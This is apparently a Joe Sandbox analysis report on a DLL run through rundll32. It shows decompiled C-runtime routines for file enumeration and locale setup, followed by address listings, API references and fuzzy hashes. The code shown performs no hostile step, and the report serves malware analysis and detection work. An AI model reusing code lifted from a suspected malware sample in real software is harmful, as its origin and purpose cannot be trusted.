																										__eflags = _t311;
																										if(_t311 != 0) {
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																												_t311 = _v660;
																											}
																											_t373 = _t311;
																										} else {
																											goto L114;
																										}
																									} else {
																										_t426 =  *((intOrPtr*)(_t311 + 1));
																										__eflags = _t426;
																										if(_t426 == 0) {
																											L114:
																											__eflags = _v628 - _t373;
																											if(_v628 != _t373) {
																												E100268B3(_v640);
																											}
																											goto L116;
																										} else {
																											__eflags = _t426 - 0x2e;
																											if(_t426 != 0x2e) {
																												goto L113;
																											} else {
																												__eflags =  *((intOrPtr*)(_t311 + 2)) - _t373;
																												if( *((intOrPtr*)(_t311 + 2)) == _t373) {
																													goto L114;
																												} else {
																													goto L113;
																												}
																											}
																										}
																									}
																									L122:
																									FindClose(_t508);
																									goto L123;
																									L116:
																									__eflags = FindNextFileW(_t508,  &_v616);
																								} while (__eflags != 0);
																								_t319 = _v624;
																								_t428 = _v656;
																								_t468 =  *_t319;
																								_t322 =  *((intOrPtr*)(_t319 + 4)) -  *_t319 >> 2;
																								__eflags = _t428 - _t322;
																								if(_t428 != _t322) {
																									E10031020(_t468, _t468 + _t428 * 4, _t322 - _t428, 4, E100268ED);
																								}
																								goto L122;
																							} else {
																								_push(_v624);
																								_push(_t373);
																								_push(_t373);
																								_push(_t483);
																								L66();
																								_t373 = _t302;
																							}
																							L123:
																							__eflags = _v664;
																							if(_v664 != 0) {
																								E100268B3(_v676);
																							}
																							_t313 = _t373;
																						} else {
																							_t313 = _t483 + 1;
																							__eflags = _t415 - _t483 + 1;
																							if(_t415 == _t483 + 1) {
																								_t291 = _v617;
																								goto L102;
																							} else {
																								_push(_t468);
																								_push(0);
																								_push(0);
																								_push(_t483);
																								L66();
																							}
																						}
																						__eflags = _v24 ^ _t519;
																						return E100037EA(_t313, _v24 ^ _t519, _t468);
																					} else {
																						goto L86;
																					}
																				}
																			} else {
																				_t332 = 0xc;
																				L83:
																				return _t332;
																			}
																		} else {
																			goto L73;
																		}
																	}
																} else {
																	_t338 = 0xc;
																	L70:
																	return _t338;
																}
															} else {
																goto L56;
															}
															goto L127;
															L56:
															_t341 = _v28;
															_t469 = _v36;
															 *((intOrPtr*)(_v20 + _t341)) = _t469;
															_t255 = _t341 + 4;
															_v28 = _t255;
															_t465 = _t469 + _v32 * 2;
															_v36 = _t465;
															__eflags = _t255 - _v48;
														} while (_t255 != _v48);
														goto L57;
													}
												} else {
													_t503 = _t502 | 0xffffffff;
													_v24 = _t502 | 0xffffffff;
													L58:
													E100268B3(_t478);
													_pop(_t389);
													goto L59;
												}
											} else {
												while(1) {
													_t442 = 0x2a;
													_v20 = _t442;
													_t443 = 0x3f;
													_v18 = _t443;
													_v16 = 0;
													_t349 = E1002FC2F(_t247,  &_v20);
													_t389 =  *_t498;
													__eflags = _t349;
													if(_t349 != 0) {
														_t350 = E100272AB(_t389, _t349,  &(_v616.cAlternateFileName));
														_t523 = _t523 + 0xc;
														_v24 = _t350;
														_t503 = _t350;
													} else {
														_t351 =  &(_v616.cAlternateFileName);
														_push(_t351);
														_push(_t478);
														_push(_t478);
														_push(_t389);
														L79();
														_t503 = _t351;
														_t523 = _t523 + 0x10;
														_v24 = _t503;
													}
													__eflags = _t503;
													if(_t503 != 0) {
														break;
													}
													_t498 = _v28 + 4;
													_v28 = _t498;
													_t247 =  *_t498;
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t366 = _v616.cAlternateFileName;
														_t388 = _v48;
														goto L42;
													}
													goto L127;
												}
												_t366 = _v616.cAlternateFileName;
												L59:
												_t461 = _t366;
												_v40 = _t461;
												__eflags = _v48 - _t461;
												asm("sbb ecx, ecx");
												_t391 =  !_t389 & _v48 - _t461 + 0x00000003 >> 0x00000002;
												__eflags = _t391;
												_v20 = _t391;
												if(_t391 != 0) {
													_t505 = _t391;
													do {
														E100268B3( *_t366);
														_t478 = _t478 + 1;
														_t366 = _t366 + 4;
														__eflags = _t478 - _t505;
													} while (_t478 != _t505);
													_t366 = _v616.cAlternateFileName;
													_t503 = _v24;
												}
												E100268B3(_t366);
												goto L64;
											}
										} else {
											_t352 = E1002449E(__eflags);
											_t503 = 0x16;
											 *_t352 = _t503;
											E1000E314();
											L64:
											__eflags = _v12 ^ _t516;
											return E100037EA(_t503, _v12 ^ _t516, _t461);
										}
									} else {
										goto L23;
									}
									goto L127;
									L23:
									_t354 = _v12;
									_t448 = _v16;
									 *((intOrPtr*)(_v32 + _t354)) = _t448;
									_t225 = _t354 + 4;
									_t382 = _t448 + _v20;
									_v16 = _t448 + _v20;
									_v12 = _t225;
									__eflags = _t225 - _v40;
								} while (_t225 != _v40);
								goto L24;
							}
						} else {
							_t495 = _t494 | 0xffffffff;
							_v12 = _t495;
							L25:
							E100268B3(_t364);
							_pop(_t383);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t364;
							_t359 = E100315D0(_t217,  &_v8);
							_t383 =  *_t490;
							__eflags = _t359;
							if(_t359 != 0) {
								_push( &_v44);
								_push(_t359);
								_push(_t383);
								L92();
								_t521 = _t521 + 0xc;
								_v12 = _t359;
								_t495 = _t359;
							} else {
								_t360 =  &_v44;
								_push(_t360);
								_push(_t364);
								_push(_t364);
								_push(_t383);
								L66();
								_t495 = _t360;
								_t521 = _t521 + 0x10;
								_v12 = _t495;
							}
							__eflags = _t495;
							if(_t495 != 0) {
								break;
							}
							_t490 = _a4 + 4;
							_a4 = _t490;
							_t217 =  *_t490;
							__eflags = _t217;
							if(_t217 != 0) {
								continue;
							} else {
								_t476 = _v44;
								_t381 = _v40;
								goto L9;
							}
							goto L127;
						}
						_t476 = _v44;
						L26:
						_t457 = _t476;
						_v32 = _t457;
						__eflags = _v40 - _t457;
						asm("sbb ecx, ecx");
						_t385 =  !_t383 & _v40 - _t457 + 0x00000003 >> 0x00000002;
						__eflags = _t385;
						_v28 = _t385;
						if(_t385 != 0) {
							_t497 = _t385;
							do {
								E100268B3( *_t476);
								_t364 = _t364 + 1;
								_t476 = _t476 + 4;
								__eflags = _t364 - _t497;
							} while (_t364 != _t497);
							_t476 = _v44;
							_t495 = _v12;
						}
						E100268B3(_t476);
						goto L31;
					}
				} else {
					_t361 = E1002449E(_t532);
					_t495 = 0x16;
					 *_t361 = _t495;
					E1000E314();
					L31:
					return _t495;
				}
				L127:
			}

0x10026add
0x10026ae0
0x10026ae4
0x10026ae6
0x10026afc
0x10026b00
0x10026b03
0x10026b05
0x10026b07
0x10026b09
0x10026b0b
0x10026b0e
0x10026b11
0x10026b14
0x10026b16
0x10026b79
0x10026b7b
0x10026b7e
0x10026b80
0x10026b84
0x10026b8d
0x10026b8e
0x10026b91
0x10026b93
0x10026b96
0x10026b9a
0x10026b9a
0x10026b9c
0x10026b9e
0x10026ba0
0x10026ba2
0x10026ba2
0x10026ba4
0x10026ba7
0x10026baa
0x10026baa
0x10026bac
0x10026bad
0x10026bad
0x10026bb8
0x10026bba
0x10026bbd
0x10026bbe
0x10026bc1
0x10026bc1
0x10026bc5
0x10026bc8
0x10026bcb
0x10026bcb
0x10026bcb
0x10026bd8
0x10026bda
0x10026bdd
0x10026bdf
0x10026bf7
0x10026bfa
0x10026bfd
0x10026bff
0x10026c02
0x10026c04
0x10026c07
0x10026c0a
0x10026c67
0x10026c6a
0x10026c6d
0x10026c6f
0x00000000
0x10026c0c
0x10026c0e
0x10026c0e
0x10026c10
0x10026c13
0x10026c13
0x10026c15
0x10026c17
0x10026c1d
0x10026c20
0x10026c20
0x10026c22
0x10026c23
0x10026c23
0x10026c27
0x10026c2a
0x10026c2d
0x10026c31
0x10026c3e
0x10026c43
0x10026c46
0x10026c48
0x10026cbc
0x10026cbd
0x10026cbe
0x10026cbf
0x10026cc0
0x10026cc1
0x10026cc6
0x10026cca
0x10026ccc
0x10026ccf
0x10026cd6
0x10026cd9
0x10026cdc
0x10026cdf
0x10026ce0
0x10026ce3
0x10026ce6
0x10026ce8
0x10026cfe
0x10026cff
0x10026d00
0x10026d02
0x10026d04
0x10026d06
0x10026d08
0x10026d0a
0x10026d0d
0x10026d10
0x10026d13
0x10026d15
0x10026d83
0x10026d85
0x10026d88
0x10026d8a
0x10026d8e
0x10026d97
0x10026d98
0x10026d9b
0x10026d9d
0x10026da0
0x10026da4
0x10026da4
0x10026da6
0x10026da8
0x10026daa
0x10026dac
0x10026dac
0x10026dae
0x10026db1
0x10026db4
0x10026db4
0x10026db7
0x10026dba
0x10026dba
0x10026dca
0x10026dd0
0x10026dd3
0x10026dd4
0x10026dd7
0x10026dd7
0x10026ddb
0x10026ddb
0x10026de9
0x10026deb
0x10026dee
0x10026df0
0x10026e08
0x10026e0b
0x10026e0e
0x10026e10
0x10026e13
0x10026e15
0x10026e18
0x10026e1b
0x10026e85
0x10026e88
0x10026e8b
0x10026e8d
0x00000000
0x10026e1d
0x10026e1f
0x10026e1f
0x10026e21
0x10026e24
0x10026e24
0x10026e26
0x10026e28
0x10026e2e
0x10026e31
0x10026e31
0x10026e34
0x10026e37
0x10026e37
0x10026e41
0x10026e49
0x10026e4d
0x10026e53
0x10026e59
0x10026e5e
0x10026e61
0x10026e63
0x10026ee4
0x10026ee5
0x10026ee6
0x10026ee7
0x10026ee8
0x10026ee9
0x10026eee
0x10026ef1
0x10026ef2
0x10026ef4
0x10026ef5
0x10026ef8
0x10026ef8
0x10026efb
0x10026efb
0x10026efd
0x10026efe
0x10026efe
0x10026f02
0x10026f03
0x10026f0a
0x10026f0d
0x10026f10
0x10026f12
0x10026f1a
0x10026f1c
0x10026f1f
0x10026f29
0x10026f2c
0x10026f2d
0x10026f2f
0x10026f43
0x10026f43
0x10026f46
0x10026f50
0x10026f55
0x10026f58
0x10026f5a
0x00000000
0x10026f5c
0x10026f5c
0x10026f61
0x10026f68
0x10026f6b
0x10026f6d
0x10026f7e
0x10026f80
0x10026f82
0x10026f82
0x10026f82
0x10026f6f
0x10026f70
0x10026f75
0x10026f78
0x10026f87
0x10026f8d
0x00000000
0x10026f90
0x10026f31
0x10026f31
0x10026f37
0x10026f3c
0x10026f3f
0x10026f41
0x10026f93
0x10026f95
0x10026f96
0x10026f97
0x10026f98
0x10026f99
0x10026f9a
0x10026f9f
0x10026fa2
0x10026fa3
0x10026fa5
0x10026fa6
0x10026fa9
0x10026faa
0x10026fab
0x10026fad
0x10026fad
0x10026fb0
0x10026fb0
0x10026fb3
0x10026fb6
0x10026fb6
0x10026fbb
0x10026fc4
0x10026fc7
0x10026fca
0x10026fcc
0x10026fd5
0x10026fd6
0x10026fd9
0x10026fe3
0x10026fe7
0x10026fe9
0x10026ffd
0x10026ffd
0x10027000
0x1002700a
0x1002700f
0x10027012
0x10027014
0x00000000
0x10027016
0x10027016
0x10027020
0x10027022
0x10027024
0x10027032
0x10027034
0x10027038
0x10027038
0x10027026
0x10027027
0x1002702c
0x1002703c
0x10027042
0x00000000
0x10027044
0x10026feb
0x10026feb
0x10026ff1
0x10026ff6
0x10026ff9
0x10026ffb
0x10027047
0x10027049
0x1002704a
0x1002704b
0x1002704c
0x1002704d
0x1002704e
0x10027053
0x10027056
0x10027057
0x10027059
0x1002705f
0x10027066
0x10027069
0x1002706c
0x1002706f
0x10027070
0x10027071
0x10027074
0x1002707a
0x1002707c
0x1002707e
0x1002707e
0x10027080
0x10027082
0x00000000
0x00000000
0x10027084
0x10027086
0x10027088
0x1002708a
0x10027095
0x10027097
0x10027099
0x00000000
0x00000000
0x10027099
0x1002708a
0x00000000
0x10027086
0x1002709b
0x1002709b
0x100270a1
0x100270a3
0x100270a9
0x100270ab
0x100270cd
0x100270cd
0x100270cf
0x100270d1
0x100270dd
0x100270dd
0x100270d3
0x100270d3
0x100270d5
0x00000000
0x100270d7
0x100270d7
0x100270d9
0x100270db
0x00000000
0x00000000
0x100270db
0x100270d5
0x100270e5
0x100270ed
0x100270f3
0x100270f4
0x100270f6
0x100270fe
0x10027104
0x1002710a
0x10027110
0x10027124
0x10027129
0x10027134
0x10027144
0x1002714a
0x1002714c
0x1002714f
0x10027172
0x10027172
0x10027177
0x1002717d
0x1002717d
0x10027183
0x10027189
0x1002718f
0x10027195
0x1002719b
0x100271bc
0x100271c1
0x100271c6
0x100271ca
0x100271d0
0x100271d3
0x100271e6
0x100271e6
0x100271ec
0x100271f2
0x100271f3
0x100271f4
0x100271f9
0x100271fc
0x10027202
0x10027204
0x10027262
0x10027268
0x10027270
0x10027275
0x1002727b
0x1002727c
0x00000000
0x00000000
0x00000000
0x100271d5
0x100271d5
0x100271d8
0x100271da
0x10027206
0x10027206
0x1002720c
0x10027214
0x10027219
0x00000000
0x100271dc
0x100271dc
0x100271df
0x00000000
0x100271e1
0x100271e1
0x100271e4
0x00000000
0x00000000
0x00000000
0x00000000
0x100271e4
0x100271df
0x100271da
0x1002727e
0x1002727f
0x00000000
0x1002721a
0x10027228
0x10027228
0x10027230
0x10027236
0x1002723c
0x10027243
0x10027246
0x10027248
0x10027258
0x1002725d
0x00000000
0x10027151
0x10027151
0x10027157
0x10027158
0x10027159
0x1002715a
0x10027162
0x10027162
0x10027285
0x10027285
0x1002728d
0x10027295
0x1002729a
0x1002729b
0x100270ad
0x100270ad
0x100270b0
0x100270b2
0x100270c7
0x00000000
0x100270b4
0x100270b4
0x100270b7
0x100270b8
0x100270b9
0x100270ba
0x100270bf
0x100270b2
0x100272a1
0x100272aa
0x00000000
0x00000000
0x00000000
0x10026ffb
0x10026fce
0x10026fd0
0x10026fd1
0x10026fd4
0x10026fd4
0x00000000
0x00000000
0x00000000
0x10026f41
0x10026f14
0x10026f16
0x10026f17
0x10026f19
0x10026f19
0x00000000
0x00000000
0x00000000
0x00000000
0x10026e65
0x10026e65
0x10026e6b
0x10026e6e
0x10026e71
0x10026e77
0x10026e7a
0x10026e7d
0x10026e80
0x10026e80
0x00000000
0x10026e24
0x10026df2
0x10026df2
0x10026df5
0x10026e8f
0x10026e90
0x10026e95
0x00000000
0x10026e95
0x10026d17
0x10026d17
0x10026d19
0x10026d1a
0x10026d20
0x10026d21
0x10026d27
0x10026d30
0x10026d37
0x10026d39
0x10026d3b
0x10026d59
0x10026d5e
0x10026d61
0x10026d64
0x10026d3d
0x10026d3d
0x10026d40
0x10026d41
0x10026d42
0x10026d43
0x10026d44
0x10026d49
0x10026d4b
0x10026d4e
0x10026d4e
0x10026d66
0x10026d68
0x00000000
0x00000000
0x10026d71
0x10026d74
0x10026d77
0x10026d79
0x10026d7b
0x00000000
0x10026d7d
0x10026d7d
0x10026d80
0x00000000
0x10026d80
0x00000000
0x10026d7b
0x10026dfd
0x10026e96
0x10026e99
0x10026e9d
0x10026ea6
0x10026ea9
0x10026ead
0x10026ead
0x10026eaf
0x10026eb2
0x10026eb4
0x10026eb6
0x10026eb8
0x10026ebd
0x10026ebe
0x10026ec2
0x10026ec2
0x10026ec6
0x10026ec9
0x10026ec9
0x10026ecd
0x00000000
0x10026ed4
0x10026cea
0x10026cea
0x10026cf1
0x10026cf2
0x10026cf4
0x10026ed5
0x10026eda
0x10026ee3
0x10026ee3
0x00000000
0x00000000
0x00000000
0x00000000
0x10026c4a
0x10026c4a
0x10026c50
0x10026c53
0x10026c56
0x10026c59
0x10026c5c
0x10026c5f
0x10026c62
0x10026c62
0x00000000
0x10026c13
0x10026be1
0x10026be1
0x10026be4
0x10026c71
0x10026c72
0x10026c77
0x00000000
0x10026c77
0x10026b18
0x10026b18
0x10026b1b
0x10026b23
0x10026b26
0x10026b2d
0x10026b2f
0x10026b31
0x10026b4c
0x10026b4d
0x10026b4e
0x10026b4f
0x10026b54
0x10026b57
0x10026b5a
0x10026b33
0x10026b33
0x10026b36
0x10026b37
0x10026b38
0x10026b39
0x10026b3a
0x10026b3f
0x10026b41
0x10026b44
0x10026b44
0x10026b5c
0x10026b5e
0x00000000
0x00000000
0x10026b67
0x10026b6a
0x10026b6d
0x10026b6f
0x10026b71
0x00000000
0x10026b73
0x10026b73
0x10026b76
0x00000000
0x10026b76
0x00000000
0x10026b71
0x10026bec
0x10026c78
0x10026c7b
0x10026c7f
0x10026c88
0x10026c8b
0x10026c8f
0x10026c8f
0x10026c91
0x10026c94
0x10026c96
0x10026c98
0x10026c9a
0x10026c9f
0x10026ca0
0x10026ca4
0x10026ca4
0x10026ca8
0x10026cab
0x10026cab
0x10026caf
0x00000000
0x10026cb6
0x10026ae8
0x10026ae8
0x10026aef
0x10026af0
0x10026af2
0x10026cb7
0x10026cbb
0x10026cbb
0x00000000

APIs

_free.LIBCMT ref: 10026C72

Strings

*?, xrefs: 10026B1B

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction ID: 847a7b85ac657849b28afe8b1ecbe38e924a00e319cb61a108d93b801de08f7f
Opcode Fuzzy Hash: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction Fuzzy Hash: 4AE15B75E0021A9FCB14CFA8D8819EEFBF5EF4C350B65816AE815E7340E771AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 10025C61, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10025C61(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed short _v772;
				void* __ebp;
				signed int _t152;
				void* _t159;
				signed int _t160;
				signed int _t162;
				signed int _t163;
				intOrPtr _t164;
				signed int _t167;
				signed int _t169;
				intOrPtr _t170;
				signed int _t173;
				signed int _t175;
				void* _t176;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				signed int _t220;
				intOrPtr* _t221;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t152 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t152 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E10023FB6(__ecx, __edx) + 0x278;
				_t159 = E100250E8(__edx, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t159 == 0) {
					L39:
					_t160 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x2
					_t252 = _t10 << 4;
					_t162 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t162 !=  *_t220) {
							break;
						}
						if( *_t162 == 0) {
							L6:
							_t163 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t162 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t162 = _t162 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t163 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t164 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t164 - _v704;
							} while (_t164 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t167 = E10024214(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t167;
							__eflags = _t167;
							if(_t167 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_v728 = _t167 + 4;
								_t169 = E10028A30(_t167 + 4, _v708,  &_v272);
								_t264 = _t263 + 0xc;
								__eflags = _t169;
								if(_t169 != 0) {
									_t170 = _v728;
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									E1000E341();
									asm("int3");
									_push(_t260);
									_t173 = (_v772 & 0x0000ffff) - 0x2d;
									__eflags = _t173;
									if(_t173 == 0) {
										L51:
										__eflags = 0;
										return 0;
									} else {
										_t175 = _t173 - 1;
										__eflags = _t175;
										if(_t175 == 0) {
											_t176 = 2;
											return _t176;
										} else {
											__eflags = _t175 == 0x31;
											if(_t175 == 0x31) {
												goto L51;
											} else {
												__eflags = 1;
												return 1;
											}
										}
									}
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E10024D73(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E1002E537(_t244, __eflags, _v704, 1, 0x10044cf0, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E1003FDBF( &_v528,  *0x1004d0b4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x10044d78; // 0x100245b6
									 *0x1004223c(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x1004d178;
										if(_t232 == 0x1004d178) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E100268B3( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E100268B3( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E100268B3( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t160 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E100268B3( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E100268B3(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t160 = _t244;
							L40:
							return E100037EA(_t160, _v8 ^ _t260, _t244);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t163 = _t162 | 0x00000001;
					__eflags = _t163;
					goto L8;
				}
				L52:
			}

0x10025c61
0x10025c6c
0x10025c73
0x10025c76
0x10025c77
0x10025c7e
0x10025c7f
0x10025c82
0x10025c92
0x10025cb5
0x10025cba
0x10025cbf
0x10025f75
0x10025f75
0x10025f75
0x00000000
0x10025cc5
0x10025cc5
0x10025cc8
0x10025ccb
0x10025cd1
0x10025cd7
0x10025cda
0x10025cdc
0x10025cdf
0x10025ce9
0x10025cef
0x00000000
0x00000000
0x10025cf5
0x10025d1e
0x10025d1e
0x10025cf7
0x10025cf7
0x10025cff
0x10025d06
0x10025d0c
0x00000000
0x10025d0e
0x10025d0e
0x10025d11
0x10025d1c
0x00000000
0x00000000
0x00000000
0x00000000
0x10025d1c
0x10025d0c
0x10025d2b
0x10025d2d
0x10025d36
0x10025d3c
0x10025d3f
0x10025d3f
0x10025d42
0x10025d45
0x10025d45
0x10025d55
0x10025d63
0x10025d68
0x10025d6f
0x10025d71
0x00000000
0x10025d77
0x10025d7d
0x10025d8a
0x10025d93
0x10025da6
0x10025dad
0x10025db2
0x10025db5
0x10025db7
0x10025ff5
0x10025ffb
0x10025ffc
0x10025ffd
0x10025ffe
0x10025fff
0x10026000
0x10026005
0x10026008
0x1002600f
0x1002600f
0x10026012
0x10026028
0x10026028
0x1002602b
0x10026014
0x10026014
0x10026014
0x10026017
0x10026025
0x10026027
0x10026019
0x10026019
0x1002601c
0x00000000
0x1002601e
0x10026020
0x10026022
0x10026022
0x1002601c
0x10026017
0x10025dbd
0x10025dbd
0x10025dcb
0x10025dce
0x10025de4
0x10025deb
0x10025df0
0x10025dd0
0x10025dd0
0x10025dd8
0x00000000
0x10025dda
0x10025dda
0x10025de0
0x10025de0
0x10025dd8
0x10025df7
0x10025dfe
0x10025e01
0x10025eff
0x10025f02
0x10025f0f
0x10025f12
0x10025f1a
0x10025f1a
0x10025f04
0x10025f0a
0x10025f0a
0x10025e07
0x10025e07
0x10025e13
0x10025e19
0x10025e1f
0x10025e22
0x10025e28
0x10025e2b
0x10025e2e
0x00000000
0x00000000
0x10025e30
0x10025e39
0x10025e3d
0x10025e46
0x10025e4a
0x10025e4b
0x10025e51
0x10025e57
0x10025e5d
0x10025e60
0x00000000
0x00000000
0x10025e62
0x10025e81
0x10025e81
0x10025e84
0x10025ea1
0x10025ea6
0x10025ea9
0x10025eab
0x10025ee9
0x10025ead
0x10025ead
0x10025eb3
0x10025eb8
0x10025ec0
0x10025ec1
0x10025ec1
0x10025ed8
0x10025edf
0x10025ee2
0x10025ee4
0x10025ee4
0x10025eef
0x10025ef5
0x10025ef5
0x10025efa
0x00000000
0x10025efa
0x10025e64
0x10025e66
0x10025e6b
0x10025e71
0x10025e7a
0x10025e7d
0x10025e7d
0x00000000
0x10025e66
0x10025f1d
0x10025f1d
0x10025f21
0x10025f29
0x10025f2f
0x10025f32
0x10025f38
0x10025f3a
0x10025f86
0x10025f8c
0x10025fd8
0x10025fd8
0x10025f8e
0x10025f93
0x10025f93
0x10025f99
0x10025f9d
0x00000000
0x10025f9f
0x10025fa3
0x10025fac
0x10025fb8
0x10025fbd
0x10025fc6
0x10025fcc
0x10025fcf
0x10025fcf
0x10025f9d
0x10025fde
0x10025fe6
0x10025fec
0x10025fef
0x10025f3c
0x10025f42
0x10025f4c
0x10025f5e
0x10025f65
0x10025f72
0x00000000
0x10025f72
0x00000000
0x10025f3a
0x10025db7
0x10025d2f
0x10025d2f
0x10025f77
0x10025f85
0x10025f85
0x00000000
0x10025d2d
0x10025d26
0x10025d28
0x10025d28
0x00000000
0x10025d28
0x00000000

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

_free.LIBCMT ref: 10025F4C
_free.LIBCMT ref: 10025F65
_free.LIBCMT ref: 10025FA3
_free.LIBCMT ref: 10025FAC
_free.LIBCMT ref: 10025FB8

Strings

